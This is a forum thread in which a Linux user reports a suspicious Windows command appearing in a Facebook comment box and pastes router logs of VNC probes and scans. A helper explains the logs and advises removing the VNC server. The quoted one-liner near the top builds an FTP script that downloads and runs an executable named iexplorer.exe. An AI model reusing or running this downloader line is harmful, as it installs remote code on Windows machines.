I was just browsing fb and had just finished posting a comment when all of a sudden in the usual comment entry box, I saw this appear…
del eq&echo open 0.0.0.0 14012 >> eq&echo user 30673 32497 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
I have my router log too if either MP or Mark wants to check it over?
That’s scary! Mark is coming back soon I think- hope he can sort it for you. Hackers are vile.
Bit of a sensationalist title, don’t you think 
Can’t talk for how secure your Fekbook account is … but that’s targeted at Windows, hence the “del” commands, and mention of iexplorer.exe
Any attempt to install any software in Linux would meet with a major FAIL, due to permissions and the execute bit being disabled … nothing to worry about.
–
I know, I was laughing my ass off when I was reading it, thinking ‘This ain’t Window$ ya douche’
But in all seriousness, how did/can they get onto my PC if I’ve got router firewall on?
I’ve also noticed an unauthorised access to port 5900
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
And this;
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
And…
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43
I have noticed that there are 3 rules set in the UPnP list
http://img197.imageshack.us/img197/1839/as17.png
how did/can they get onto my PC if I've got router firewall on?
They didn’t … if anything they may have compromised fekbook.
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19 [LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
Do you have VNC installed on the local PC with this IP address (192.168.1.2) … or a port for VNC forwarded through your router ? … port 5900 is usually used for VNC
and someone from an IP in Chile is attempting to connect.
If you’re not running VNC or another service on that port that requires an open port for incoming connections … disable/remove the port forward rule … or set gufw to refuse incoming connections
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
Unlikely to be a problem … more likely the router misidentifying reset packets as a DoS attack, but in any case the router will be dropping them.
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44 [UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43
Perfectly normal … an application on your local PC (192.168.1.2) is requesting (through UPnP) that the router adjust ists setting to open a port for it … the router is just logging the event for reference.
[quote author=Mark Greaves (PCNetSpec) link=topic=11060.msg86935#msg86935 date=1376954802]
Do you have VNC installed on the local PC with this IP address (192.168.1.2) .. or a port for VNC forwarded through your router ? .. port 5900 is *usually* used for VNC
Maybe but I don’t knowingly use it.
and someone from an IP in Chile is attempting to connect.
As it’s not in my prot forwarding range then they’re trying to hack me!
If you're not running VNC or another service on that port that requires an open port for incoming connections .. disable/remove the port forward rule .. or set gufw to refuse incoming connections
I can’t remember installing VNC. What’s it used for anyway and what do I do to completley remove all trace of it? And what’s ‘gufw’
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17 Unlikely to be a problem .. more likely the router misidentifying reset packets as a DoS attack, but in any case the router will be dropping them.
That’s OK then!
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44 [UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43Perfectly normal … an application on your local PC (192.168.1.2) is requesting (through UPnP) that the router adjust ists setting to open a port for it … the router is just logging the event for reference.
Why would/does it do that?
A Windows using friend, who also uses f’book, now has a machine the screen of which goes white a few seconds after boot.
The hardware is fine as it boots off Linux disks and runs ok.
The last thing he was doing on it was using f’book.
Poor fellow!
Mark, I have got VNC installed…‘Remote Desktop Viewer’
It’s the server you want to remove, not so much the client
What’s the output from:
dpkg -l | grep -i vnc
pooky2483@pooky2483-ubuntu12:~$ dpkg -l | grep -i vnc
ii libgtk-vnc-1.0-0 0.5.0-1ubuntu1 VNC viewer widget for GTK+2 (runtime libraries)
ii libgtk-vnc-2.0-0 0.5.0-1ubuntu1 VNC viewer widget for GTK+3 (runtime libraries)
ii libgvnc-1.0-0 0.5.0-1ubuntu1 VNC gobject wrapper (runtime libraries)
ii libvncserver0 0.9.8.2-2ubuntu1 API to write one’s own vnc server
ii python-gtk-vnc 0.5.0-1ubuntu1 VNC viewer widget for GTK+2 (Python binding)
ii vino 3.4.2-0ubuntu1.2 VNC server for GNOME
pooky2483@pooky2483-ubuntu12:~$
I have just been looking through more of my router logs and found this entry…
[Internet connected] IP address: 82.24.4.95, Tuesday, August 20,2013 10:51:25
Brighton - http://open.mapquest.com/?q=50.8333,-0.1500
I’ve noticed further attempts…
[DoS Attack: TCP/UDP Chargen] from source: 173.242.115.176, port 33546, Tuesday, August 20,2013 20:12:29
Pennsylvania - http://open.mapquest.com/?q=41.4486,-75.7280
[DoS Attack: ACK Scan] from source: 50.98.118.30, port 57727, Wednesday, August 21,2013 00:38:12
British Columbia - http://open.mapquest.com/?q=49.2667,-122.7833
[DoS Attack: RST Scan] from source: 75.16.229.104, port 19215, Wednesday, August 21,2013 00:41:11
Indiana - http://open.mapquest.com/?q=38.0000,-87.5631
[DoS Attack: RST Scan] from source: 92.109.111.5, port 54188, Wednesday, August 21,2013 00:42:30
Netherlands - Human Verification
And someone seems VERY determined to get onto my network as they are trying every 20 - 40 seconds
[WLAN access rejected: incorrect security] from MAC address 2c:41:38:c1:4b:9b, Wednesday, August 21,2013 00:55:50
STOP PANICKING
And if the router logs are causing you to panic … STOP READING THEM
You WILL get your ports scanned regularly, unfortunately there are that many idiot script kiddies in the world automatically scanning random IP’s for open ports … but that’s what your routers firewall is for.
And if you think whoever is attempting to access your wireless is going to crack your password if he only tries every 20 seconds, it’ll take him forever … but if it realy bothers you, enable MAC address filtering in your router, where the router only allows wireless adapters with MAC addresses you specify to connect.
(that isn’t 100% proof against wireless cracking because someone with the correct knowledge could spoof your MAC address, but it does add another layer of security … there is NO 100% safe wireless security except turning wireless OFF)
Trust me, even if the people who are scanning for open ports find one … Linux has your back.
The best you can do for whichever neighbour is attempting to connect to your router wirelessly, is keep an eye out for the MAC adresses fo connected devices and if there’s one connected that shouldn’t be … change the wireless WPA2 key … but the worst he’s liable to do is piggy back your internet connection until you notice him and change the password, it’ll then take him ages again to crack the new one.
As I said … STOP PANICKING or switch to ethernet cabling and disable wireless, which the only 100% sure fire way of protecting against wireless cracking.
I’m NOT panicking.
If I was I’d be begging and pleading for help on how to stop these people from doing stuff. I’m just commenting on who and what is happening.
I’m actually having fun mapping them on Google 
I need to disable VNC as someone managed to get on my PC through port 5900
[LAN access from remote] from 50.116.40.245:43314 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[LAN access from remote] from 50.116.40.245:43232 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[LAN access from remote] from 50.116.40.245:43218 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
OMG LOL… Now CAPITAL ONE are trying to hack/down me :o :o :o :o
[DoS Attack: ACK Scan] from source: 64.40.9.14, port 6005, Wednesday, August 21,2013 12:43:31
No they didn’t … they managed to get TO your PC on port 5900 … the only thing they would have been able to do was get asked for the VNC password (hopefully you set one), which they don’t have.
They do NOT have access to your PC or network.
I’ve already said … uninstall vnc:
sudo apt-get remove --purge vino
Just been checking it out and connected to myself and could not see anywhere anything about a password?
Whoever it is that’s hacking my PC through fb is managing to actually control my PC as I was in Dolphin and the file screen was going up and down while I was trying to scroll it up.
If you want to see if you have a problem re; remote access, try running this from a friends house (against your IP address);
http://www.tenable.com/products/nessus/select-your-operating-system
(Runs on Linux, you’ll need to download it …)